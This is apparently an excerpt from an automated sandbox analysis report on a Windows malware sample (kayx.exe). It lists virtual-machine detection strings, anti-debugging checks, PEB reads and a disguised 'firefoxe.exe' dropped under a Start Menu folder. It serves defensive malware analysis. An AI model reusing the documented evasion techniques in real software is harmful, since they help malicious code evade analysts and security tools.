Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp Binary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f563
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000012.00000000.366341161.0000000004DF3000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&}
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000012.00000000.373649853.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000012.00000000.367147757.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000012.00000000.367196676.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f
Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp Binary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\kayx.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\kayx.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00408690 rdtsc 17_2_00408690
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_004098F0 LdrLoadDll, 17_2_004098F0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h] 17_2_00E040E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h] 17_2_00E040E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h] 17_2_00E040E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E058EC mov eax, dword ptr fs:[00000030h] 17_2_00E058EC
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov ecx, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E490AF mov eax, dword ptr fs:[00000030h] 17_2_00E490AF
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3F0BF mov ecx, dword ptr fs:[00000030h] 17_2_00E3F0BF
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3F0BF mov eax, dword ptr fs:[00000030h] 17_2_00E3F0BF
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3F0BF mov eax, dword ptr fs:[00000030h] 17_2_00E3F0BF
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09080 mov eax, dword ptr fs:[00000030h] 17_2_00E09080
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E83884 mov eax, dword ptr fs:[00000030h] 17_2_00E83884
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E83884 mov eax, dword ptr fs:[00000030h] 17_2_00E83884
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED1074 mov eax, dword ptr fs:[00000030h] 17_2_00ED1074
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC2073 mov eax, dword ptr fs:[00000030h] 17_2_00EC2073
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E20050 mov eax, dword ptr fs:[00000030h] 17_2_00E20050
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E20050 mov eax, dword ptr fs:[00000030h] 17_2_00E20050
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h] 17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h] 17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h] 17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h] 17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h] 17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h] 17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h] 17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h] 17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h] 17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h] 17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h] 17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h] 17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h] 17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED4015 mov eax, dword ptr fs:[00000030h] 17_2_00ED4015
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED4015 mov eax, dword ptr fs:[00000030h] 17_2_00ED4015
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h] 17_2_00E87016
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h] 17_2_00E87016
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h] 17_2_00E87016
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h] 17_2_00E0B1E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h] 17_2_00E0B1E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h] 17_2_00E0B1E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E941E8 mov eax, dword ptr fs:[00000030h] 17_2_00E941E8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E361A0 mov eax, dword ptr fs:[00000030h] 17_2_00E361A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E361A0 mov eax, dword ptr fs:[00000030h] 17_2_00E361A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h] 17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h] 17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h] 17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h] 17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E869A6 mov eax, dword ptr fs:[00000030h] 17_2_00E869A6
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h] 17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h] 17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h] 17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h] 17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2C182 mov eax, dword ptr fs:[00000030h] 17_2_00E2C182
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3A185 mov eax, dword ptr fs:[00000030h] 17_2_00E3A185
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32990 mov eax, dword ptr fs:[00000030h] 17_2_00E32990
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0C962 mov eax, dword ptr fs:[00000030h] 17_2_00E0C962
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0B171 mov eax, dword ptr fs:[00000030h] 17_2_00E0B171
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0B171 mov eax, dword ptr fs:[00000030h] 17_2_00E0B171
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2B944 mov eax, dword ptr fs:[00000030h] 17_2_00E2B944
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2B944 mov eax, dword ptr fs:[00000030h] 17_2_00E2B944
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h] 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h] 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h] 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h] 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 mov ecx, dword ptr fs:[00000030h] 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3513A mov eax, dword ptr fs:[00000030h] 17_2_00E3513A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3513A mov eax, dword ptr fs:[00000030h] 17_2_00E3513A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h] 17_2_00E09100
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h] 17_2_00E09100
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h] 17_2_00E09100
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32AE4 mov eax, dword ptr fs:[00000030h] 17_2_00E32AE4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32ACB mov eax, dword ptr fs:[00000030h] 17_2_00E32ACB
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h] 17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h] 17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h] 17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h] 17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h] 17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1AAB0 mov eax, dword ptr fs:[00000030h] 17_2_00E1AAB0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1AAB0 mov eax, dword ptr fs:[00000030h] 17_2_00E1AAB0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3FAB0 mov eax, dword ptr fs:[00000030h] 17_2_00E3FAB0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3D294 mov eax, dword ptr fs:[00000030h] 17_2_00E3D294
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3D294 mov eax, dword ptr fs:[00000030h] 17_2_00E3D294
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBB260 mov eax, dword ptr fs:[00000030h] 17_2_00EBB260
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBB260 mov eax, dword ptr fs:[00000030h] 17_2_00EBB260
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8A62 mov eax, dword ptr fs:[00000030h] 17_2_00ED8A62
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4927A mov eax, dword ptr fs:[00000030h] 17_2_00E4927A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h] 17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h] 17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h] 17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h] 17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECEA55 mov eax, dword ptr fs:[00000030h] 17_2_00ECEA55
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E94257 mov eax, dword ptr fs:[00000030h] 17_2_00E94257
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E44A2C mov eax, dword ptr fs:[00000030h] 17_2_00E44A2C
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E44A2C mov eax, dword ptr fs:[00000030h] 17_2_00E44A2C
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E18A0A mov eax, dword ptr fs:[00000030h] 17_2_00E18A0A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h] 17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E05210 mov ecx, dword ptr fs:[00000030h] 17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h] 17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h] 17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0AA16 mov eax, dword ptr fs:[00000030h] 17_2_00E0AA16
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0AA16 mov eax, dword ptr fs:[00000030h] 17_2_00E0AA16
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECAA16 mov eax, dword ptr fs:[00000030h] 17_2_00ECAA16
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECAA16 mov eax, dword ptr fs:[00000030h] 17_2_00ECAA16
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E23A1C mov eax, dword ptr fs:[00000030h] 17_2_00E23A1C
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2DBE9 mov eax, dword ptr fs:[00000030h] 17_2_00E2DBE9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E853CA mov eax, dword ptr fs:[00000030h] 17_2_00E853CA
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E853CA mov eax, dword ptr fs:[00000030h] 17_2_00E853CA
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED5BA5 mov eax, dword ptr fs:[00000030h] 17_2_00ED5BA5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h] 17_2_00E34BAD
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h] 17_2_00E34BAD
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h] 17_2_00E34BAD
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC138A mov eax, dword ptr fs:[00000030h] 17_2_00EC138A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBD380 mov ecx, dword ptr fs:[00000030h] 17_2_00EBD380
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E11B8F mov eax, dword ptr fs:[00000030h] 17_2_00E11B8F
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E11B8F mov eax, dword ptr fs:[00000030h] 17_2_00E11B8F
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3B390 mov eax, dword ptr fs:[00000030h] 17_2_00E3B390
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32397 mov eax, dword ptr fs:[00000030h] 17_2_00E32397
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0DB60 mov ecx, dword ptr fs:[00000030h] 17_2_00E0DB60
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E33B7A mov eax, dword ptr fs:[00000030h] 17_2_00E33B7A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E33B7A mov eax, dword ptr fs:[00000030h] 17_2_00E33B7A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0DB40 mov eax, dword ptr fs:[00000030h] 17_2_00E0DB40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8B58 mov eax, dword ptr fs:[00000030h] 17_2_00ED8B58
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0F358 mov eax, dword ptr fs:[00000030h] 17_2_00E0F358
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC131B mov eax, dword ptr fs:[00000030h] 17_2_00EC131B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC14FB mov eax, dword ptr fs:[00000030h] 17_2_00EC14FB
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h] 17_2_00E86CF0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h] 17_2_00E86CF0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h] 17_2_00E86CF0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8CD6 mov eax, dword ptr fs:[00000030h] 17_2_00ED8CD6
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1849B mov eax, dword ptr fs:[00000030h] 17_2_00E1849B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2746D mov eax, dword ptr fs:[00000030h] 17_2_00E2746D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3A44B mov eax, dword ptr fs:[00000030h] 17_2_00E3A44B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9C450 mov eax, dword ptr fs:[00000030h] 17_2_00E9C450
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9C450 mov eax, dword ptr fs:[00000030h] 17_2_00E9C450
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3BC2C mov eax, dword ptr fs:[00000030h] 17_2_00E3BC2C
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h] 17_2_00ED740D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h] 17_2_00ED740D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h] 17_2_00ED740D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h] 17_2_00E86C0A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h] 17_2_00E86C0A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h] 17_2_00E86C0A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h] 17_2_00E86C0A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
